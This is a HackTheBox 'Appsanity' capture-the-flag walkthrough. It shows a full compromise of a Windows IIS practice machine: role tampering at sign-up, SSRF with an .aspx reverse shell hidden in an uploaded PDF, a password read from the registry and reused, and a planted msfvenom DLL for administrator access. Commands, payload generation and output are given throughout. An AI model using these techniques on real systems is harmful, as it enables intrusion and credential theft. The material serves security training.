HackTheBox - Appsanity

, , , , , , , , , , , ,

Tools

  • nmap
  • gobuster
  • ffuf
  • burpe
  • msfvenom
  • netcat
  • metasploit
  • dnSpy
  • Evil-WinRM

Getting User

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
┌──(kali㉿kali)-[~/HTB/Appsanity]
└─$ sudo nmap -sS -sV -oA nmap/initial_scan 10.129.46.232
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-29 06:22 EDT
Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 06:23 (0:00:17 remaining)
Nmap scan report for 10.129.46.232
Host is up (0.43s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT    STATE SERVICE VERSION
80/tcp  open  http    Microsoft IIS httpd 10.0
443/tcp open  https?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.66 seconds

┌──(kali㉿kali)-[~/HTB/Appsanity]
└─$ sudo nmap -sS -p- -Pn --min-rate 500 -oA nmap/full_tcp_scan 10.129.46.232
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-29 06:27 EDT
Nmap scan report for 10.129.46.232
Host is up (0.43s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
443/tcp  open  https
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 263.20 seconds

┌──(kali㉿kali)-[~/HTB/Appsanity]
└─$ sudo nmap -sC -sV -oA nmap/script_scan -p 80,443,5985 10.129.46.232
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-29 06:42 EDT
Nmap scan report for 10.129.46.232
Host is up (0.43s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to https://meddigi.htb/
443/tcp  open  https?
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.55 seconds


Foothold

add vhost to /etc/hosts

1
2
3
┌──(kali㉿kali)-[~/HTB/Appsanity]
└─$ echo "10.129.46.232 meddigi.htb" | sudo tee -a /etc/hosts
10.129.46.232 meddigi.htb

enumarating directories using gobuster, found nothing.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~/HTB/Appsanity]
└─$ gobuster dir -w /usr/share/dirb/wordlists/common.txt -u http://meddigi.htb -b 404,302    
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://meddigi.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404,302
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

Using burpe to intercept the request when creating an account, change the account type from 1 to 2 which gives me a doctor’s account.

1
Acctype=2

We get an access_token cookie which looks like a jwt token

access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjgiLCJlbWFpbCI6ImRvY3RvckB3aG8uY29tIiwibmJmIjoxNjk4NTc4Njk2LCJleHAiOjE2OTg1ODIyOTYsImlhdCI6MTY5ODU3ODY5NiwiaXNzIjoiTWVkRGlnaSIsImF1ZCI6Ik1lZERpZ2lVc2VyIn0.f482mFiYLxXIOctRjncQ8WlE2Wz1v9L9QZwTjAWm0i0;

when decoded we get this payload, nothing useful.

1
2
3
4
5
6
7
8
9
{
  "unique_name": "8",
  "email": "doctor@who.com",
  "nbf": 1698578696,
  "exp": 1698582296,
  "iat": 1698578696,
  "iss": "MedDigi",
  "aud": "MedDigiUser"
}

fuzzing vhosts we found a portal subdomain

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali㉿kali)-[~]
└─$ ffuf -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u https://meddigi.htb -H 'Host: FUZZ.meddigi.htb' -c 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : https://meddigi.htb
 :: Wordlist         : FUZZ: /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.meddigi.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

portal                  [Status: 200, Size: 2976, Words: 1219, Lines: 57, Duration: 325ms]

I couldn’t find the ref.number anywhere.

so I went to portal.meddigi.htb/Profile and intercepted the request and the response.
and added Set-Cookie header to set the access_token in the response

1
2
3
4
5
6
HTTP/2 302 Found
Location: /Profile
Server: Microsoft-IIS/10.0
Strict-Transport-Security: max-age=2592000
Set-Cookie: access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjEwIiwiZW1haWwiOiJkb2N0b3JAd2hvLmNvbSIsIm5iZiI6MTY5ODg0OTIzMywiZXhwIjoxNjk4ODUyODMzLCJpYXQiOjE2OTg4NDkyMzMsImlzcyI6Ik1lZERpZ2kiLCJhdWQiOiJNZWREaWdpVXNlciJ9.8s17W4ZWYU6H_elGsVj-xtI_RDmCnqEcJk4RVF_zPP8; expires=Wed, 01 Nov 2023 16:33:53 GMT; path=/; secure; samesite=strict; httponly
Date: Wed, 01 Nov 2023 14:33:53 GMT

which gets us into the doctor’s portal profile

Found nothing in Scheduler

Issue Prescription page could be vulnerable to SSRF, I intercepted the request and sent it to repeater

We find the address http://127.0.0.1:8080/ which allows us to see the reports

I found an aspx reverse shell https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx
or we could use msfvenom to create a shell

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/HTB/Appsanity/files]
└─$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=tun0 LPORT=9998 -f aspx -o shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 684 bytes
Final size of aspx file: 4565 bytes
Saved as: shell.aspx

I went over to Upload Report page and uploaded a blank pdf and intercepted the request
Let’s change the extension of our PDF from .pdf to .aspx and add our shell after %%EOF

Change host to your IP and forward the request
and now we can listen to the port using nc

1
2
3
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ...

We can head back to the repeater and we should see our report

If we go to the Raw tab of the response and scroll down we’ll find the View Report Link of our uploaded shell which is ViewReport.aspx?file=2be24979-ddae-4f57-a9e7-d94e44429b64_blank.aspx
Added it the Link parameter http%3a//127.0.0.1%3a8080/ViewReport.aspx?file=2be24979-ddae-4f57-a9e7-d94e44429b64_blank.aspx and sent the request

and it spawned a shell

1
2
3
4
5
6
7
8
9
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.71] from (UNKNOWN) [10.129.71.74] 65463
Spawn Shell...
Microsoft Windows [Version 10.0.19045.3570]
(c) Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>

found user flag in the desktop of the user’s folder

1
2
3
c:\Users\svc_exampanel\Desktop>type user.txt
type user.txt
ee64bccf15802ae700de4ccf1a4d9944

Getting Root

Information Gathering

Going to open a session using metasploit and msfvenom to have a persisting session

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > seet PAYLOAD windows/x64/meterpreter/reverse_https
[-] Unknown command: seet
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_https
PAYLOAD => windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => 10.10.14.71
msf6 exploit(multi/handler) > set LPORT 9998
LPORT => 9998
msf6 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf6 exploit(multi/handler) > exploit

[*] Started HTTPS reverse handler on https://10.10.14.71:9998
[!] https://10.10.14.71:9998 handling request from 10.129.134.38; (UUID: omvmaxhy) Without a database connected that payload UUID tracking will not work!
[*] https://10.10.14.71:9998 handling request from 10.129.134.38; (UUID: omvmaxhy) Staging x64 payload (201820 bytes) ...
[!] https://10.10.14.71:9998 handling request from 10.129.134.38; (UUID: omvmaxhy) Without a database connected that payload UUID tracking will not work!
[!] https://10.10.14.71:9998 handling request from 10.129.134.38; (UUID: omvmaxhy) Without a database connected that payload UUID tracking will not work!
[*] https://10.10.14.71:9998 handling request from 10.129.134.38; (UUID: omvmaxhy) Staging x64 payload (201820 bytes) ...
[!] https://10.10.14.71:9998 handling request from 10.129.134.38; (UUID: omvmaxhy) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.10.14.71:9998 -> 10.129.134.38:62064) at 2023-11-04 06:55:45 -0400
[*] Meterpreter session 2 opened (10.10.14.71:9998 -> 10.129.134.38:62063) at 2023-11-04 06:55:45 -0400

msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                          Connection
  --  ----  ----                     -----------                          ----------
  1         meterpreter x64/windows  APPSANITY\svc_exampanel @ APPSANITY  10.10.14.71:9998 -> 10.129.134.38:62064 (10.129.134.38)
  2         meterpreter x64/windows  APPSANITY\svc_exampanel @ APPSANITY  10.10.14.71:9998 -> 10.129.134.38:62063 (10.129.134.38)

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter >

Found some dlls in inetpub folder and downloaded them for inspection

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
meterpreter > dir
Listing: c:\inetpub\ExaminationPanel\ExaminationPanel\bin
=========================================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100666/rw-rw-rw-  591752   fil   2023-09-24 11:46:11 -0400  EntityFramework.SqlServer.dll
100666/rw-rw-rw-  4991352  fil   2023-09-24 11:46:13 -0400  EntityFramework.dll
100666/rw-rw-rw-  13824    fil   2023-09-24 11:46:10 -0400  ExaminationManagement.dll
100666/rw-rw-rw-  40168    fil   2023-09-24 11:46:10 -0400  Microsoft.CodeDom.Providers.DotNetCompilerPlatform.dll
100666/rw-rw-rw-  206512   fil   2023-09-24 11:46:11 -0400  System.Data.SQLite.EF6.dll
100666/rw-rw-rw-  206520   fil   2023-09-24 11:46:11 -0400  System.Data.SQLite.Linq.dll
100666/rw-rw-rw-  431792   fil   2023-09-24 11:46:11 -0400  System.Data.SQLite.dll
040777/rwxrwxrwx  24576    dir   2023-09-24 11:49:49 -0400  roslyn
040777/rwxrwxrwx  0        dir   2023-09-24 11:49:49 -0400  x64
040777/rwxrwxrwx  0        dir   2023-09-24 11:49:49 -0400  x86
meterpreter > download ExaminationManagement.dll
[*] Downloading: ExaminationManagement.dll -> /home/kali/HTB/Appsanity/ExaminationManagement.dll
[*] Downloaded 13.50 KiB of 13.50 KiB (100.0%): ExaminationManagement.dll -> /home/kali/HTB/Appsanity/ExaminationManagement.dll
[*] Completed  : ExaminationManagement.dll -> /home/kali/HTB/Appsanity/ExaminationManagement.dll

I Installed Wine[https://www.winehq.org/] to be able to use dnSpy on Linux to analyze the DLL

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/Downloads]
└─$ unzip dnSpy-net-win64.zip -d dnSpy

┌──(kali㉿kali)-[~/Downloads]
└─$ cd dnSpy  

┌──(kali㉿kali)-[~/Downloads/dnSpy]
└─$ wine dnSpy.exe

Found an encryption key located in the registry

Spawn a shell to query in the registry and search for the key

1
2
3
4
5
6
7
8
9
10
11
meterpreter > shell
Process 3292 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.3570]
(c) Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>reg query HKLM\Software\MedDigi
reg query HKLM\Software\MedDigi

HKEY_LOCAL_MACHINE\Software\MedDigi
    EncKey    REG_SZ    1g0tTh3R3m3dy!!

Got the list of users to try the password on

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
c:\windows\system32\inetsrv>dir C:\Users
dir C:\Users
 Volume in drive C has no label.
 Volume Serial Number is F854-971D

 Directory of C:\Users

10/18/2023  05:43 PM    <DIR>          .
10/18/2023  05:43 PM    <DIR>          ..
10/18/2023  06:08 PM    <DIR>          Administrator
09/24/2023  11:16 AM    <DIR>          devdoc
09/15/2023  06:59 AM    <DIR>          Public
10/18/2023  06:40 PM    <DIR>          svc_exampanel
10/17/2023  03:05 PM    <DIR>          svc_meddigi
10/18/2023  07:10 PM    <DIR>          svc_meddigiportal
               0 File(s)              0 bytes
               8 Dir(s)   3,733,925,888 bytes free

Using Evil-WinRM, we were able to login to devdoc using the password

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~/HTB/Appsanity/files]
└─$ evil-winrm -i meddigi.htb -u devdoc -p "1g0tTh3R3m3dy\!\!"      
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\devdoc\Documents>

Downloaded winPEAS[https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS] and ran it

1
2
3
4
┌──(kali㉿kali)-[~/Tools]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.71.74 - - [01/Nov/2023 13:37:14] "GET /winPEASx64.exe HTTP/1.1" 200 -
1
2
*Evil-WinRM* PS C:\Users\devdoc\Desktop> curl http://10.10.14.71/winPEASx64.exe -o winpeas.exe
*Evil-WinRM* PS C:\Users\devdoc\Desktop> ./winpeas.exe

The script tells us about ReportManagement which runs on port 100 and is located in C:\Program Files\ReportManagement

Download ReportManagement.exe found in the folder and analyse it using IDA Free

1
2
3
4
5
6
*Evil-WinRM* PS C:\Program Files\ReportManagement> download ReportManagement.exe
                                        
Info: Downloading C:\Program Files\ReportManagement\ReportManagement.exe to ReportManagement.exe
                                        
Info: Download successful!

It tells us about C:\Program Files\ReportManagement\Libraries and externalupload.dll

Going to C:\Program Files\ReportManagement\Libraries , we see externalupload.dll doesn’t exist.
We can try to create a malicious dll to escalate privilege


Privilege Escalation

Create a payload using msfvenom and run a reverse shell in metasploit

1
2
3
4
5
6
7
8
9
┌──(kali㉿kali)-[~/HTB/Appsanity/files]
└─$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=tun0 LPORT=1234 -f dll -o externalupload.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 596 bytes
Final size of dll file: 9216 bytes
Saved as: externalupload.dll

1
2
3
4
5
6
7
8
9
10
11
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_https
PAYLOAD => windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

Upload the payload to the Libraries folder

1
2
3
4
5
6
7
Evil-WinRM* PS C:\Program Files\ReportManagement\Libraries> upload externalupload.dll
                                        
Info: Uploading /home/kali/HTB/Appsanity/files/externalupload.dll to C:\Program Files\ReportManagement\Libraries\externalupload.dll
                                        
Data: 12288 bytes of 12288 bytes copied
                                        
Info: Upload successful!

Going to use chisel to forward port 100 running on the victim’s machine to trigger the upload function

1
2
3
4
5
┌──(kali㉿kali)-[~/HTB/Appsanity/files]
└─$ chisel server --port 6666 --reverse
2023/11/04 09:24:07 server: Reverse tunnelling enabled
2023/11/04 09:24:07 server: Fingerprint vzyjBtK8hiIqkFohzO0L1c0qj0XzCUSlGutBa5Farv4=
2023/11/04 09:24:07 server: Listening on http://0.0.0.0:6666

Upload chisel.exe to devdoc’s Desktop and forward port 100

1
2
3
4
5
6
7
8
9
10
11
12
*Evil-WinRM* PS C:\Users\devdoc\Desktop> upload chisel.exe
                                        
Info: Uploading /home/kali/HTB/Appsanity/files/chisel.exe to C:\Users\devdoc\Desktop\chisel.exe
                                        
Data: 12008104 bytes of 12008104 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\devdoc\Desktop> ./chisel.exe client 10.10.14.71:6666 R:100:127.0.0.1:100
chisel.exe : 2023/11/04 07:39:16 client: Connecting to ws://10.10.14.71:6666
    + CategoryInfo          : NotSpecified: (2023/11/04 07:3...0.10.14.71:6666:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
2023/11/04 07:39:18 client: Connected (Latency 293.0101ms)

Now connect to the port using netcat which opens the Report Management admin console that’s running on port 100.
Trigger our payload using upload command.

1
2
3
4
5
6
┌──(kali㉿kali)-[~/HTB/Appsanity]
└─$ nc 127.0.0.1 100
Reports Management administrative console. Type "help" to view available commands.
upload externalupload.dll
Attempting to upload to external source.

It works and gets us an admin session

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
msf6 exploit(multi/handler) > 
[*] Started HTTPS reverse handler on https://10.10.14.71:1234
[!] https://10.10.14.71:1234 handling request from 10.129.134.38; (UUID: jmuiiwgn) Without a database connected that payload UUID tracking will not work!
[*] https://10.10.14.71:1234 handling request from 10.129.134.38; (UUID: jmuiiwgn) Staging x64 payload (201820 bytes) ...
[!] https://10.10.14.71:1234 handling request from 10.129.134.38; (UUID: jmuiiwgn) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.10.14.71:1234 -> 10.129.134.38:62087) at 2023-11-04 10:48:50 -0400
sessions

Active sessions
===============

  Id  Name  Type                     Information                          Connection
  --  ----  ----                     -----------                          ----------
  1         meterpreter x64/windows  APPSANITY\Administrator @ APPSANITY  10.10.14.71:1234 -> 10.129.134.38:62087 (10.129.134.38)

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > whoami
[-] Unknown command: whoami
meterpreter > getuid
Server username: APPSANITY\Administrator
meterpreter > cd C:/Users/Administrator
meterpreter > cd Desktop
meterpreter > dir
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2023-09-24 13:28:16 -0400  desktop.ini
100444/r--r--r--  34    fil   2023-11-04 06:14:15 -0400  root.txt